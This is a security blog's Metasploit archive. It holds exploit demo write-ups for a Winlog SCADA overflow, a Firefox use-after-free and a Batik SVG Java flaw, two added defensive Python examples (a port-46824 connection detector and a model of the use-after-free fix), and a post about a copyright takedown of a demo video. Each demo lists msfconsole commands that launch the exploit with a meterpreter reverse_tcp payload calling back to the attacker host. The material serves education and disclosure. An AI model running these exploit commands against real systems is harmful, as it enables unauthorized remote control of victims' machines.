Category Archives: Metasploit

All my posts regarding the Metasploit framework, auxiliaries, plugins and exploits.

Scada Sielco Sistemi Winlog Buffer Overflow 2.07.14 Metasploit Demo

Timeline :

Vulnerability discovered by m-1-k-3 on 2012-06-03
Public release of the vulnerability on 2012-06-04
Metasploit PoC provided on 2012-06-07

PoC provided by :

m-1-k-3

Reference(s) :

EDB-ID-18986
BID-53811

Affected version(s) :

Sielco Sistemi Winlog version 2.07.14 and earlier

Tested on Windows XP Pro SP3 with :

Sielco Sistemi Winlog 2.07.14

Description :

This module exploits a buffer overflow in Sielco Sistemi Winlog version 2.07.14 and earlier. When a specially formatted packet is sent to the Runtime.exe service listening on TCP port 46824, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/scada/winlog_runtime_2
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 46824 192.168.178.22

exploit

getuid
sysinfo
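From the defender's side, the useful fact in the description above is that the vulnerable Runtime.exe listener sits on TCP port 46824 and that, in a plant network, only a known set of engineering or HMI hosts should ever talk to it. The following is an added example for this post (not part of the Metasploit module or of the vendor's software) that flags connections to that port from hosts outside an allowlist and counts attempts per source, so a scan followed by an exploit attempt from one host stands out. The log format, the allowlist and all addresses are constructed for the example; only the port number comes from the vulnerability description.

```python
"""Flag TCP connections to the Winlog Runtime.exe listener (TCP/46824) from hosts
that are not on the engineering-workstation allowlist.

Added example, not vendor or Metasploit code. Log format and addresses are
constructed; only WINLOG_RUNTIME_PORT comes from the vulnerability description.
"""
import re
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

WINLOG_RUNTIME_PORT = 46824

# Constructed firewall-style connection log:
# "<date> <time> <proto> <src>:<sport> -> <dst>:<dport> <flags>"
SAMPLE_LOG = """\
2012-06-07 09:58:11 TCP 192.168.178.50:49152 -> 192.168.178.22:46824 SYN
2012-06-07 10:01:02 TCP 192.168.178.100:51234 -> 192.168.178.22:46824 SYN
2012-06-07 10:01:02 TCP 192.168.178.100:51235 -> 192.168.178.22:46824 SYN
2012-06-07 10:01:07 TCP 192.168.178.100:51236 -> 192.168.178.22:46824 SYN
2012-06-07 10:03:40 TCP 192.168.178.100:51300 -> 192.168.178.22:80 SYN
2012-06-07 10:04:15 UDP 192.168.178.77:5353 -> 224.0.0.251:5353 -
"""

# Constructed allowlist: the engineering workstation that legitimately uses Winlog.
ALLOWED_SOURCES = ["192.168.178.50/32"]

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) (?P<flags>\S+)$"
)


@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    reason: str


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def find_unexpected_runtime_access(log_text, allowed_sources=ALLOWED_SOURCES,
                                   port=WINLOG_RUNTIME_PORT):
    """Return an Alert for every TCP connection to `port` whose source is not allowlisted."""
    allowed = [ip_network(n) for n in allowed_sources]
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["dport"] != port:
            continue
        src = ip_address(rec["src"])
        if any(src in net for net in allowed):
            continue  # known HMI / engineering host, expected traffic
        alerts.append(Alert(rec["ts"], rec["src"], rec["dst"],
                            f"TCP/{port} from non-allowlisted host"))
    return alerts


def attempts_per_source(alerts):
    """Count alerts per source address; repeated hits from one host suggest scan + exploit."""
    return dict(Counter(a.src for a in alerts))


if __name__ == "__main__":
    found = find_unexpected_runtime_access(SAMPLE_LOG)
    for a in found:
        print(f"{a.ts} {a.src} -> {a.dst}: {a.reason}")
    print(attempts_per_source(found))
```

In the sample data the allowlisted host's connection is ignored, the web and mDNS traffic is ignored because the port differs, and the three connections from the unallowlisted host are reported together with a per-source count of 3. The same function works on any log that can be mapped to the five fields the regex expects; in practice the allowlist would come from the asset inventory rather than a constant.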

CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI on 2011-12-06
Coordinated public release of the vulnerability on 2011-12-20
Metasploit PoC provided on 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3659
OSVDB-78736
MFSA-2012-04

Affected version(s) :

Mozilla Firefox before version 10.0
Mozilla Firefox before version 3.6.26
Mozilla Thunderbird before version 10.0
Mozilla Thunderbird before version 3.1.18
Mozilla SeaMonkey before version 2.7

Tested on Windows XP Pro SP3 with :

Mozilla Firefox version 9.0.1

Description :

This Metasploit module is quite unstable and exploitation is unreliable.

This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removing child nodes from an nsDOMAttribute can leave a child accessible after removal, because the AttributeChildRemoved notification is sent prematurely: mFirstChild is not set to NULL until after this call is made, so the removed child is still reachable while the notification runs. By carefully manipulating the memory layout, this can lead to arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_attribchildremoved
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo
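The root cause described above is an ordering bug, not a missing check: the parent tells its observers that a child is gone while its own mFirstChild pointer still points at that child, so anything that runs during the notification can hold on to an object that is about to be freed. The following is an added example for this post, a simplified model and not Mozilla's code, that shows the buggy ordering beside the corrected one (unlink first, notify afterwards). The class and function names are invented for the illustration, and the "freed" flag stands in for the allocator releasing the object.

```python
"""Model of the notify-before-unlink ordering bug behind the Firefox issue above.

Added example, not Mozilla's code. Node, StaleReferenceObserver and demo are
invented names; `freed` stands in for the allocator releasing the object.
"""


class Node:
    def __init__(self, name):
        self.name = name
        self.first_child = None   # plays the role of mFirstChild
        self.observers = []       # callables invoked as observer(parent, removed_child)
        self.freed = False        # set when the object is "released"

    def add_observer(self, callback):
        self.observers.append(callback)

    def _notify_child_removed(self, child):
        # In the real bug this is the point where script or other observers get to run.
        for callback in self.observers:
            callback(self, child)

    def remove_child_vulnerable(self):
        """Buggy ordering: observers run while first_child still points at the child."""
        child = self.first_child
        if child is None:
            return None
        self._notify_child_removed(child)   # premature notification
        self.first_child = None             # pointer cleared too late
        child.freed = True
        return child

    def remove_child_fixed(self):
        """Safe ordering: unlink the child before anyone else can observe the node."""
        child = self.first_child
        if child is None:
            return None
        self.first_child = None             # unlink first
        self._notify_child_removed(child)   # observers can no longer reach it via the parent
        child.freed = True
        return child


class StaleReferenceObserver:
    """Records whether the removed child was still reachable through the parent
    at the moment the removal notification fired."""

    def __init__(self):
        self.stale_reachable = None

    def __call__(self, parent, removed):
        self.stale_reachable = parent.first_child is removed


def demo(use_fixed):
    """Run one removal with the chosen ordering and report what the observer saw."""
    parent = Node("attribute")
    parent.first_child = Node("text")
    observer = StaleReferenceObserver()
    parent.add_observer(observer)
    removed = parent.remove_child_fixed() if use_fixed else parent.remove_child_vulnerable()
    return {
        "stale_reachable": observer.stale_reachable,   # True only with the buggy ordering
        "parent_unlinked": parent.first_child is None,  # True in both cases afterwards
        "child_freed": removed.freed,                   # True in both cases afterwards
    }


if __name__ == "__main__":
    print("vulnerable ordering:", demo(use_fixed=False))
    print("fixed ordering:     ", demo(use_fixed=True))
```

Both orderings end in the same final state, which is why the bug is easy to miss in review: the difference is only visible from inside the notification, where the vulnerable version exposes a reference that becomes dangling a few instructions later. The general defensive pattern is the one in remove_child_fixed: invalidate every pointer to an object before running any code path that could observe it, and only then release it.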

Squiggle 1.7 SVG Browser Java Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Nicolas Gregoire
Details of the vulnerability provided by Nicolas Gregoire on 2012-05-11
Metasploit PoC provided on 2012-05-17

PoC provided by :

Nicolas Gregoire
sinn3r
juan vazquez

Reference(s) :

http://www.agarri.fr/blog/

Affected version(s) :

Squiggle Browser 1.7
Batik framework 1.7

Tested on Mac OS X 10.7.1 with :

Squiggle Browser 1.7

Description :

This module abuses the SVG support of the Squiggle Browser included in the Batik framework 1.7 to execute Java code, through a crafted SVG file referencing a JAR file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) it must support SVG version 1.1 or newer, (2) it must support Java code and (3) the “Enforce secure scripting” option must be disabled. The module has been tested against Windows and Linux platforms.

Commands :

use exploit/multi/misc/batik_svg_java
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Metasploit Digital Music Pad SEH overflow demo censored as copyright infringement

Yesterday I received an email from YouTube notifying me that the Metasploit video demonstration of the Digital Music Pad SEH overflow (EDB-ID-15134) had been removed for copyright infringement.

YouTube disabled the video as a result of a third-party notification from E-Soft.co.uk, the vendor of Digital Music Pad.

The video, which I recorded in February 2011, was a demonstration of the “exploit/windows/fileformat/digital_music_pad_pls” Metasploit exploitation module. This module was developed by Abhishek Lyall in October 2010.

When I recorded the exploitation demonstration, the affected software was freely downloadable from the vendor's website, and no sound or other copyrighted material was used in the video.

My videos, available on my YouTube channel, are made for educational purposes, helping security researchers understand how to use Metasploit modules or other exploits and warning consumers about product vulnerabilities. If you search “Digital Music Pad” on Google, you can find an uncensored copy of my video demonstration, and this video is also available on SecurityTube.

Many legal cases exist regarding vulnerability disclosure; all of them are reported on Attrition.org's list of legal threats against security researchers.

I really don’t understand why the Metasploit Digital Music Pad SEH overflow demo was removed, and why E-Soft.co.uk asked YouTube to remove my video. So I will contact Attrition and submit this case to them, because it really seems to be an abuse of copyright.

Also, this case could be a dangerous precedent for other security researchers who are publishing demonstration videos on YouTube.

Currently I’m no longer able to submit new videos on YouTube or modify any settings of my channel, because I’m considered a criminal and I’m forced to watch a stupid “YouTube Copyright School” and to fill in a form with stupid questions regarding copyright.

Update 1 : 18/05 at 12:47. First contact with Attrition.org in order to submit a new legal threat case to them.

Update 2 : 18/05 at 14:38. I have finally recovered my YouTube account after answering the YouTube Copyright School questions. Funny stuff: the form submission wasn’t compatible with Google Chrome, so I had to switch to Safari in order to submit my answers and recover my YouTube account. #fail

Update 3 : 18/05 at 15:23. It seems that I can no longer select the Creative Commons license for my new videos on YouTube; I’m forced to use the YouTube standard license. #fail

Update 4 : 27/05 at 11:07. After some days in Hamburg, Germany, I sent an email to E-Soft.co.uk in order to learn the reason for the “copyright infringement”.

Update 5 : 28/05 at 11:01. After some discussions with Attrition, we have discovered the reason submitted by E-Soft.co.uk to YouTube: “Software: “Digital Music Pad” *Software interface is shown *Enables illegal copying of the software”.